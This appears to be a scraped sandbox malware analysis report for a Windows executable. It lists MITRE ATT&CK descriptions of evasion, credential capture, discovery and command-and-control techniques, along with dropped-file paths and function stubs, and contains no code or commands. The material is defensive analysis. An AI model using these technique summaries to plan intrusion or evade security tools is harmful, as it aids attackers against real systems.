Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aRxo3E278B.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rbQTKRDg.exe_b2e16567d38d3665bdcdecb9364bfea9b9d478f_a13a3c5e_cb8f4664-8611-4edf-b501-4bc53d663cd6\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99D2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AFC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B1C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

C:\Users\user\AppData\Local\Temp\59400905.exe

C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
aRxo3E278B.exe

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
COMMON

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 004064D7 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
COMMON

Function 008F29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 008F1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Function 008F1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 008F6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Function 008F2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre